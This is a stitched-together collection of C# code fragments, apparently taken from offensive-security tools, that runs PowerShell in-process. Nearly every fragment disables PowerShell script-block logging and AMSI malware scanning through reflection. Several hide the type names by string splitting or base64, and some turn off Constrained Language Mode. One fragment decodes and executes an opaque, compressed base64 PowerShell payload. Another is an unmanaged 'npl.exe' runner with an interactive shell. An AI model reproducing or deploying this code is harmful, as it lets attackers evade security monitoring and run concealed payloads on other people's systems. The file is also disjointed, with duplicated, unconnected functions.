public static string UnPosh(string[] command)
{
//https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs
//https://twitter.com/mattifestation/status/735261176745988096?lang=en
PowerShell pInst = PowerShell.Create();
var pELP = pInst.GetType().Assembly.GetType("Sys" + "tem." + "Mana" + "geme" + "nt.Aut" + "oma" + "tio" + "n.Tr" + "aci" + "ng.P" + "SE" + "twL" + "og" + "Pr" + "ovi" + "d" + "er");
if (pELP != null)
{
var eP = pELP.GetField("e" + "tw" + "Pr" + "ov" + "id" + "er", BindingFlags.NonPublic | BindingFlags.Static);
var eTP = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
eP.SetValue(null, eTP);
}
bool bA = true;
var aU = pInst.GetType().Assembly.GetType("S" + "ys" + "te" + "m.M" + "an" + "ag" + "em" + "ent" + ".A" + "ut" + "om" + "at" + "i" + "o" + "n.A" + "ms" + "i" + "U" + "ti" + "l" + "s");
if (aU != null && bA == true)
{
aU.GetField("a" + "m" + "s" + "iI" + "n" + "i" + "tF" + "ai" + "l" + "ed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
}
string readCommand = "";
for (int i = 1; i < command.Length; i++)
{
readCommand = readCommand + " " + command[i];
}
pInst.Commands.AddScript(readCommand);
pInst.Commands.AddCommand("Ou" + "t-" + "S" + "tr" + "ing");
StringBuilder stringBuilder = new StringBuilder();
try
{
Collection <PSObject> results = pInst.Invoke();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
}
catch
{
stringBuilder.Append(string.Format("Error {0}", pInst.InvocationStateInfo.Reason));
}
return(stringBuilder.ToString().Trim());
}
public static void Main(string[] args)
{
string Command = @"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Hello from PowerShell!');";
using (PowerShell PowerShellInstance = PowerShell.Create())
{
var PSEtwLogProvider = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
if (PSEtwLogProvider != null)
{
var EtwProvider = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
EtwProvider.SetValue(null, EventProvider);
}
PowerShellInstance.AddScript(Command);
PowerShellInstance.Invoke();
}
}
// Following a discussion with cobbr over the implementation this was a much more elegant solution :)
// Almost directly ripped from https://github.com/cobbr/SharpSploit/blob/master/SharpSploit/Execution/Shell.cs#L37-L55
// Credits to Ryan Cobb
/// <summary>
/// Executes specified PowerShell code using System.Management.Automation.dll and bypasses
/// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging).
/// </summary>
/// <param name="PowerShellCode">PowerShell code to execute.</param>
/// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param>
/// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param>
/// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param>
/// <returns>Output of executed PowerShell.</returns>
/// <remarks>
/// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module
/// logging bypass goes to Lee Christensen (@_tifkin).
/// </remarks>
public void RunPowerShell(string encpath, string encpass, string outfile, string scriptname, string arguments, bool BypassLogging = true, bool BypassAmsi = true)
{
Archiver archiver = new Archiver();
byte[] unpacked = archiver.ArchiveHelper(encpath, encpass, scriptname);
string PowerShellCode = System.Text.Encoding.UTF8.GetString(unpacked);
PowerShellCode += "\n" + arguments;
System.Windows.Forms.MessageBox.Show(PowerShellCode);
if (PowerShellCode == null || PowerShellCode == "")
{
return;
}
using (PowerShell ps = PowerShell.Create())
{
BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
if (BypassLogging)
{
var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
if (PSEtwLogProvider != null)
{
var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
EtwProvider.SetValue(null, EventProvider);
}
}
if (BypassAmsi)
{
var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
if (amsiUtils != null)
{
amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
}
}
ps.AddScript(PowerShellCode);
var results = ps.Invoke();
string output = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray());
ps.Commands.Clear();
System.IO.File.WriteAllText(outfile, output);
}
}
/// <summary>
/// Executes specified PowerShell code using System.Management.Automation.dll and bypasses
/// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging).
/// </summary>
/// <param name="PowerShellCode">PowerShell code to execute.</param>
/// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param>
/// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param>
/// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param>
/// <returns>Output of executed PowerShell.</returns>
/// <remarks>
/// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module
/// logging bypass goes to Lee Christensen (@_tifkin).
/// </remarks>
public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
{
if (PowerShellCode == null || PowerShellCode == "")
{
return("");
}
using (PowerShell ps = PowerShell.Create())
{
BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
if (BypassLogging)
{
var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
if (PSEtwLogProvider != null)
{
var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
EtwProvider.SetValue(null, EventProvider);
}
}
if (BypassAmsi)
{
var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
if (amsiUtils != null)
{
amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
}
}
ps.AddScript(PowerShellCode);
if (OutString)
{
ps.AddCommand("Out-String");
}
var results = ps.Invoke();
string output = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray());
ps.Commands.Clear();
return(output);
}
}
public static string InvokePS(string command)
{
// I had to implement a custom PSHost in order to get Write-Host to work.
// This wouldn't be an issue if all PowerShell scripts used Write-Output
// instead of Write-Host, but enough use Write-Host that it's worth it
// to implement a custom PSHost
CustomPSHost host = new CustomPSHost();
var state = InitialSessionState.CreateDefault();
state.AuthorizationManager = null; // Bypass PowerShell execution policy
using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
{
runspace.Open();
using (Pipeline pipeline = runspace.CreatePipeline())
{
BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
var PSEtwLogProvider = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
EtwProvider.SetValue(null, EventProvider);
var amsiUtils = pipeline.Commands.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
pipeline.Commands.AddScript(command);
pipeline.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
pipeline.Commands.Add("out-default");
pipeline.Invoke();
}
}
string output = ((CustomPSHostUserInterface)host.UI).Output;
return(output);
}
public static void InvokePS(string Command, bool BypassAmsi)
{
try
{
using (PowerShell PowerShellInstance = PowerShell.Create())
{
// Disable ScriptBlockLogging
//
// In PowerShell:
// $EtwProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static');
// $EventProvider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid());
// $EtwProvider.SetValue($null, $EventProvider);
var PSEtwLogProvider = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
if (PSEtwLogProvider != null)
{
var EtwProvider = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
EtwProvider.SetValue(null, EventProvider);
}
// Disable AMSI
// In PowerShell: [Ref].Assembly.GetType('http://System.Management .Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
var AmsiUtils = PowerShellInstance.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
if (AmsiUtils != null && BypassAmsi == true)
{
AmsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
}
PowerShellInstance.AddScript(Command);
PowerShellInstance.Invoke();
}
}
catch (Exception e)
{
Console.WriteLine("ERRROR: " + e.Message);
}
}
static void Main(string[] args)
{
try
{
string Command = @"Start-Sleep 1";
using (PowerShell powerShellInstance = PowerShell.Create())
{
var psEtwLogProvider = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
if (psEtwLogProvider != null)
{
var etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
etwProvider.SetValue(null, eventProvider);
}
var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
fi.SetValue(null, SystemEnforcementMode.None);
powerShellInstance.AddScript(Command);
powerShellInstance.Invoke();
}
AllocConsole();
SetConsoleTitle("Windows PowerShell");
SetIcon();
var ps = new UnmanagedPSEntry();
ps.Start(null, args);
Environment.Exit(0);
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
}
static void Main(string[] args)
{
string Payload = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAbgBWAFoAdABjADkAbwA0AEUAUAA3AHUAWAA2AEgAeAArAEEATwBlAFkAaABuAFMAaABPAFoAZwArAEoAQQA0ADUASgBLADcARQBqAGcAZwB5AGIAVQAwAGMAeQBQAHMAQgBSAFMATQA1AFUAaAB5AEMATQAzAHgAMwAyADkAbAA4ADUAYQAwAFQAVAB1AFgAeQBRAGQAcgB0AGIAdgBQADcAcgBNAHYAWQB0AGgAZgBLAGcAMQB6AGUAZwBXAGEAOQBrAEUAKwA4AGgAQwA2AGcAaQBlADYAegBSAEkAMgBBAFgAbABYAHIAeABzAHAAeQBBAEMAawA1AG0ATQBlAE0AZwAwADMATABPAFkAUgAwADEAdwBrAEEAWQB2AGoARQBRAHQAbgBwAEUAbQBlAEgAUwAwAHoAVwBGAG0ATwBDAHAAdgAyAFYATwB0AFUAMQBYADIALwArAHQAcwBCAHIAZABhAE8AYQBiAFYAQwBxADkAWAAzADkAYwBQAEQAOQB6AFkAcQB2AEgAWAB2ADgAegBuAEMASwBsADkAcABCAEEAagA5AFUAQwBRAGEARQB1ADMAYgAxAGoAaABMAFEAZwBOAEoAZwBwAE0AMgBLAFQAawB6AFcASgBhAGQAeQB4AHYAMwAyAFgASQBZAG8AbAAvAEIAdwB1AHUATQA3AGkASABVAHgAQgBzAHMAVQA3AGgAaQBjAHkARAAyAE8AcgBVACsAaABKAG4AawBlAGsAawBEAHUAVQB5ADEAbQBFAGkAVwBUAHAAZQAwAHgAKwArAFQAaQBFAEYAYwBKAEIAcABoAFkASQB5ADIAUgBRAFQAbwBiAGYAaQBtAFkAYwBEAFQASwBVAGkAagBpAHUAUQBFAHAANABFAHgANwBMAEkAbwA0AHMAbgBrAHAANwBaAHIAdgBiAFgAeABaADUAQgBDAEcAZgBQAFQAVwBJAFMAegBQAHYAOQBxAHcASwBzAEgAeAAwAGIAMABKAHkAegBYAGcAbwBPAGoAbQBzAFgASABtAEQATwBtAFMANgB6AG4AegBUAGUAZABnAEQAYQBwAGwAbAB5AGEAWgArAHYAQgBBADIAYQBzAEoAYgBxADMAagBSADcANgB1AEwAegBaAEMAeQBnAFEAQwBaAFoAUgBJACsAeQA1AEYAUABOAFQAcABxAEIAMgBXAEsAagBuAG4AbABjAFcAeABBAHIAMgA3AEYAQwA0AHMAbABZAEYARwByAEsAOQBnADgAYgBEAEwAMgBCAGoALwBMADgASQBiAHAAegB2AG8AeABlAFcAUgBtAHoAdwBIAGIAYgBhADEAYgA1ADEARgBXAHgAcQBuAHkAVwBtADkAcQBNADkAagBBAEUAOABhAGQAcABLAFEAbQBFAFkAUgBxAFQAcgB3AGYAawB4AC8AUgAzADAANgBWAEsARABLAGgAbQBEAG8AbABkAE0AQQB4AGsAZgBsAG0AUABZAFIAYwBCAEEAQQBuAFkAMQBXAHUAYQBWAGsAaQBYAFUARwA1AHMAYgBvAEEAUABKAEUAagBVAFcAYwBuADcATwBFAHgAYgBuAFYAUwBvADUAbwB6AEsAcABsAEkAawB6AG8AaAA4AGgAbQBlAGkAcABhAHcAMQBIAGkARABDADgAdQB5AE4ATwBXAGoAaABFAC8AdAA0AFIAWgAyAHgAOQBtAC8AMQBBAHYATQB3ADkAZABhADIAOQA5AE0ANQBhADIALwBRAGcAQwBWAC8AbgA5AHgAYQBIAFIAdAAxAHkAaQByAHEATgBoAGgAVgBLAHEAMABkADMATAA3AE0AMQA5AGIAUwBjAGEARAAvAGoATQA5AGoATABPAEQATQAzADAAUQA4AHoAcgB0AGIAMgBVAGkAWQBlAG4AbAAzAHIAWgA4AFIAdgBnAHMAdgBjAHYAUgB4AFIANwB0ADMAQwBLAEkAdwA1AHoAagBWAG0ARwB3AGcAeAA0ACsAQwBTADUAeQBLADQAawByAGsALwB3ACsAQwBJAGQANAA1AFIATQBFADMAcwBLAFAATABiAGIAWAArAEoAZgA3AGIAYgBLAEwAUwBHAHUASAA1AEEAOAA3AGsAWgBvAGkANgBUAEMAbABwAFAATABOAFEAbABKAHkAcgB2AGEANQBlAGQASgBJAHQAagBZAHoAUAA3AHMAWQAxADkAVQBQAEUAcgBOAGYAKwBnAFUAagAyADIAdgAyADkAZABOAEQAMwB4AFkAbwAwAEUAWQBhAEQAdwB4AFAAVwBLAEkARwBNAEsAWgBHAEsANgB2ADAAbABzADMAQgA0AHAAVQAyAG8AaABaAEwAUQA1AFMAdgBHADAAegBHAFMAOABQAGkANwBDAGwAMQB0AHEAYgArAHMAaQBHADAASABPAFIAbwBOAFkAbABqAE4AdABvAG4AbwBPAGkAVABTAHoASgBDAEkAbAA3AEIASwBGAGgAVgBmAEkAbgBtAGEAagBHAEcAagB3AHMAWABkAFQAbgBHAG0AYgAzAFEAdABKAHYASQBrAG0AQgA2ADYATABzAFMARQBPAHYAUQBBAFcANABUAFUAOQBpAGEASwBTAGYAUwBHAFUAeABsAFMAbQA2AHcAbgBqAFkALwBUAHIAUAB1AE8AUwBsAGoAegBWADkAYgAxAFYANwBKAGkATABIAHkAegBmAHgAbABZAC8AZgBHAFYAZwByADYAeAB2AEkASwArAFIARgArADkAawBnAHAAWgBJAGEARgB0ADgANQBYAEgATQAvAEMATgBhAEkAYQBWAGIAbgBrAFIAaQBvAGMAagBWAGcATgBUAG8AKwB3AGEANQA3AGQAegBXAEQAaAB0AGsASQBIAGwAawBjAEQANwBRAEMAaAA1AEUARgBrADQAYgBSAEQANwBXAHEAMQBWAGEAYwBVAG4ATQBaADQAQgBOAEUAOAA2AEUANwBYADYATAAxAFkATQB4AFMASgBBAEkAaABMAGMANQBhAHgAdgBlADgANAA1AGEAcABHACsAeAAzAGoAVwBxAE8ANAB0AHkALwBvAEsANQBXAEkAWABjADAAYgBhADgAZQBSAFcAMgA1AGMAMwA5AGQAdgB0ADkATQAxAHIARgBRAEEANgBFAGwAeQA5ADcASwBQAHAAOQBwADAAcQA4AEUAOQBXAE4ARwBVAC8ATQBnAE8AVAA5AEgAQQBKADYAZAAzAEIANQBoAGgASQBpAGgAUwA0AFMAagBFADAAVQBzAGEAawBpAHQAbgBuACsASABNADIAUgBEADgAbwB5AEwAZQBiADUATwAwAHUANwBmAFIAeABaAFEAeABKAG4ATQBkAG0ARwBWAGoAYQBCAEcASQArAEwAbABPADcAdQBqAGQAOAB0AFIAcwBOAGEAawBYAHkAMQBQAGgATgBEAEgAdABiAG0ARABNAFkAcwBpAC8AVQByAGYAWgBOADYAZwB4AFQAVgB6AEgAawB4AHcAawBXAEsAbwBvADIANQA5AFEAdgAyAE8ALwBQAFgAOABhAEIAOABUADIASwBpAHkAawBrAE8ATgA5AE4AUABYAHAAZAAyAHUARgBlAHIAQwAyAHkANQBIAGoAeABrAG8ASABTAGgAWQBoADcAZQAzAEwASwBNAHoAdwA0AG8ATQB3AHEAWABaADgAMwAxAEwAcwBFAFgASwBNADgARABRADkAKwB0AG4AVgBUAGkANQBFAHUAeQBmAHMASQBnAGUAYQB6AHYANgBtAHMAZQBMADYAYwBRAGgAbQBLAGUAWgByAHEANABjAEIAMABiAEoAeQBWAHIAMgB0AGkAdQBKADkAZQBEAGkAMAA3AHYAYwB2AEQAcABTAC8AOQBUAGYAOQBCAHEAMgB5AHYARABpAHIAbAA5ADQAUQB0AHgAUgBkAFAAZQBpAGkASQBzAEgAMAArACsATwBGAG4ARAAvAEwALwAyAFgAMABpADYAdgBVADcAUQA2AHYAYwA3AHYAWAA5AE8AZQBzAEgARgA1AGEAQQBWAEQASwA1ADcAcgBZAGEAVAA4AHEAagB4AC8AWgA5AEoAWgByAG0AawBUAGQAegA0AHgARABOADcALwBjAE4AdABTADMAVAA2AGYALwB5AHQALwBPAG4AbABnAHgALwBIAGYAdgBqAFEAZgBjAHkAcQBuAFMATgB4AEMAdQA4AHEAbQBWAHAAOABmAHAAVABMAHcAKwBWAGYAagArAGUAZgBtAHMAVABMAEUAdQBJAEkAcwA1ADEAeQBPAHQAYgA3AGQAcgBlAFAAdgBZAEoAQwA3AE8ASABVAHAAVABpAHIAUwBTAHgAWQBwAE4AWgA3AFgATABsAFcAQgBQADgATAAxAFEAUwA3AHgAagBTAGIAYwA0AHQAZQBmAEcAdwBHADEAMwB5AGIASABWAFoAOAAvAFUAcwA0AFAARwAyADYAegA4AEsAVgBKAEwAVwBuAFkAbwBDAFUAVgBJADgAcgBGAFcAdgB0AEkAOQBjAGkAcQAvADgAQQAnACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkA"));
using (PowerShell powerShellInstance = PowerShell.Create())
{
var psEtwLogProvider = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
if (psEtwLogProvider != null)
{
var etwProvider = psEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
var eventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
etwProvider.SetValue(null, eventProvider);
}
var amsi = powerShellInstance.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
var amsifield = amsi.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static);
amsifield.SetValue(null, true);
var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
fi.SetValue(null, SystemEnforcementMode.None);
powerShellInstance.AddScript(Payload).Invoke();
}
}
/// <summary>
/// Executes specified PowerShell code using System.Management.Automation.dll and bypasses
/// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging).
/// </summary>
/// <param name="PowerShellCode">PowerShell code to execute.</param>
/// <param name="OutString">Switch. If true, appends Out-String to the PowerShellCode to execute.</param>
/// <param name="BypassLogging">Switch. If true, bypasses ScriptBlock and Module logging.</param>
/// <param name="BypassAmsi">Switch. If true, bypasses AMSI.</param>
/// <returns>Output of executed PowerShell.</returns>
/// <remarks>
/// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module
/// logging bypass goes to Lee Christensen (@_tifkin).
/// </remarks>
public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true)
{
if (string.IsNullOrEmpty(PowerShellCode))
{
return("");
}
using (PowerShell ps = PowerShell.Create())
{
BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static;
if (BypassLogging)
{
var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
if (PSEtwLogProvider != null)
{
var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags);
var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
EtwProvider.SetValue(null, EventProvider);
}
}
if (BypassAmsi)
{
var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
if (amsiUtils != null)
{
amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true);
}
}
ps.AddScript(PowerShellCode);
if (OutString)
{
ps.AddCommand("Out-String");
}
PSDataCollection <object> results = new PSDataCollection <object>();
ps.Streams.Error.DataAdded += (sender, e) =>
{
Console.WriteLine("Error");
foreach (ErrorRecord er in ps.Streams.Error.ReadAll())
{
results.Add(er);
}
};
ps.Streams.Verbose.DataAdded += (sender, e) =>
{
foreach (VerboseRecord vr in ps.Streams.Verbose.ReadAll())
{
results.Add(vr);
}
};
ps.Streams.Debug.DataAdded += (sender, e) =>
{
foreach (DebugRecord dr in ps.Streams.Debug.ReadAll())
{
results.Add(dr);
}
};
ps.Streams.Warning.DataAdded += (sender, e) =>
{
foreach (WarningRecord wr in ps.Streams.Warning)
{
results.Add(wr);
}
};
ps.Invoke(null, results);
string output = string.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray());
ps.Commands.Clear();
return(output);
}
}
private void InitProvider(string providerId)
{
Guid providerGuid = new Guid(providerId);
this.m_provider = new System.Diagnostics.Eventing.EventProvider(providerGuid);
}
private void InitProvider(string providerId)
{
Guid providerGuid = new Guid(providerId);
this.m_provider = new System.Diagnostics.Eventing.EventProvider(providerGuid);
}
static void Main(string[] args)
{
PowerShell ps = PowerShell.Create();
// Disable Logging
var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
if (PSEtwLogProvider != null)
{
var EtwProvider = PSEtwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
EtwProvider.SetValue(null, EventProvider);
}
// Disable AMSI
var AmsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
if (AmsiUtils != null)
{
AmsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
}
if (args.Length >= 1)
{
if (args[0].ToLower() == "-encode")
{
if (args.Length == 2)
{
Byte[] bytes = System.Text.Encoding.Unicode.GetBytes(args[1]);
Console.WriteLine(System.Convert.ToBase64String(bytes));
}
else
{
Console.WriteLine("usage: npl.exe -encode \"& commands; separated; by; semicolons;\"");
}
}
else if (args[0].ToLower() == "-decode")
{
if (args.Length == 2)
{
String cmd = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[1]));
Console.WriteLine(cmd);
}
else
{
Console.WriteLine("usage: npl.exe -decode {base_64_string}");
}
}
else if (args[0].ToLower() == "-shell")
{
List <string> history = new List <string>();
while (true)
{
ps.AddScript("pwd");
string pwd = ps.Invoke()[0].ToString();
string prompt = "PS " + pwd + "> ";
string input = TabableReadLine(ps, prompt, pwd, history);
if (string.IsNullOrEmpty(input))
{
continue;
}
if (input.ToLower() == "exit")
{
break;
}
history.Add(input);
Invoke(ps, input);
ps.Commands.Clear();
}
}
else
{
if (args[0].ToLower() == "-encodedcommand" || args[0].ToLower() == "-enc")
{
String script = "";
for (int argidx = 1; argidx < args.Length; argidx++)
{
script += System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[argidx]));
}
Invoke(ps, script);
}
else
{
String script = "";
for (int argidx = 0; argidx < args.Length; argidx++)
{
script += @args[argidx];
}
Invoke(ps, script);
}
}
}
else
{
Console.WriteLine("\r\nusage:\r\nnpl.exe -shell\r\nnpl.exe \"{powershell single command}\"\r\nnpl.exe \"& {commands; semi-colon; separated}\"\r\nnpl.exe -encodedcommand {base64_encoded_command}\r\nnpl.exe -encode \"commands to encode to base64\"\r\nnpl.exe -decode {base64_encoded_command}");
}
}
static void Main(string[] args)
{
PowerShell ps = PowerShell.Create();
// Disable Logging
String myType = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFQAcgBhAGMAaQBuAGcALgBQAFMARQB0AHcATABvAGcAUAByAG8AdgBpAGQAZQByAA=="));
String myField = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("ZQB0AHcAUAByAG8AdgBpAGQAZQByAA=="));
var x = ps.GetType().Assembly.GetType(myType);
if (x != null)
{
var y = x.GetField(myField, BindingFlags.NonPublic | BindingFlags.Static);
var z = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid());
y.SetValue(null, z);
}
// Disable AMSI
myType = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA=="));
myField = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String("YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=="));
x = ps.GetType().Assembly.GetType(myType);
if (x != null)
{
x.GetField(myField, BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);
}
if (args.Length >= 1)
{
if (args[0].ToLower() == "-encode")
{
if (args.Length == 2)
{
Byte[] bytes = System.Text.Encoding.Unicode.GetBytes(args[1]);
Console.WriteLine(System.Convert.ToBase64String(bytes));
}
else
{
Console.WriteLine("usage: npl.exe -encode \"& commands; separated; by; semicolons;\"");
}
}
else if (args[0].ToLower() == "-decode")
{
if (args.Length == 2)
{
String cmd = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[1]));
Console.WriteLine(cmd);
}
else
{
Console.WriteLine("usage: npl.exe -decode {base_64_string}");
}
}
else if (args[0].ToLower() == "-shell")
{
List <string> history = new List <string>();
while (true)
{
ps.AddScript("pwd");
string pwd = ps.Invoke()[0].ToString();
string prompt = "PS " + pwd + "> ";
string input = TabableReadLine(ps, prompt, pwd, history);
if (string.IsNullOrEmpty(input))
{
continue;
}
if (input.ToLower() == "exit")
{
break;
}
history.Add(input);
Invoke(ps, input);
ps.Commands.Clear();
}
}
else
{
if (args[0].ToLower() == "-encodedcommand" || args[0].ToLower() == "-enc")
{
String script = "";
for (int argidx = 1; argidx < args.Length; argidx++)
{
script += System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(args[argidx]));
}
Invoke(ps, script);
}
else
{
String script = "";
for (int argidx = 0; argidx < args.Length; argidx++)
{
script += @args[argidx];
}
Invoke(ps, script);
}
}
}
else
{
Console.WriteLine("\r\nusage:\r\nnpl.exe -shell\r\nnpl.exe \"{powershell single command}\"\r\nnpl.exe \"& {commands; semi-colon; separated}\"\r\nnpl.exe -encodedcommand {base64_encoded_command}\r\nnpl.exe -encode \"commands to encode to base64\"\r\nnpl.exe -decode {base64_encoded_command}");
}
}
